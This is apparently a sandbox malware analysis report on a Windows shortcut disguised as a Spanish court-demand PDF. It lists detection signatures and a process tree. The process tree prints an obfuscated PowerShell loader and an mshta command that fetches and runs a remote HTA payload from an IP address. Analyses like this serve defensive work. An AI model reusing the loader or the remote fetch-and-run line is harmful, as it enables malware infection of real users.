Windows
Analysis Report
DEMANDA JUICIO JUZGADO01.pdf.lnk
Overview
General Information
Detection
| Score | 92 |
|---|---|
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- powershell.exe (PID: 7292 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted $E='T:17S2 zMhsAlcpo6 5y9tar4/.' ; &(-join( $E[(472-46 8),(979-96 9),(299-28 8)])) ^= ( -join($E[( 472-468),( 979-969),( 299-288)]) ); ^= *% ( -join($E[( 757-750),( 472-468),( 769-761),( -904+904), (979-969)] )); foreac h($S in @( (727-719), (-217+236) ,(-171+190 ),(387-374 ),(-940+94 1),(-632+6 55),(-622+ 645),(-144 +162),(771 -749),(-48 2+506),(-4 57+459),(6 91-675),(- 573+595),( 518-494),( -755+757), (-277+280) ,(262-257) ,(-797+821 ),(-706+70 8),(-556+5 71),(-847+ 862),(-704 +727),(628 -615),(308 -296),(-21 7+223),(-3 38+357),(5 84-561),(7 63-742),(2 97-283),(- 211+228),( 677-660),( 470-453),( -88+108),( -503+512), (-258+282) ,(194-186) ,(856-837) ,(-659+679 ))){$i+=$E [$S]}; *% $i; MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - mshta.exe (PID: 7516 cmdline: "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- svchost.exe (PID: 7836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
No configs have been found
No yara matches
| System Summary |
|---|
| Source: Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) |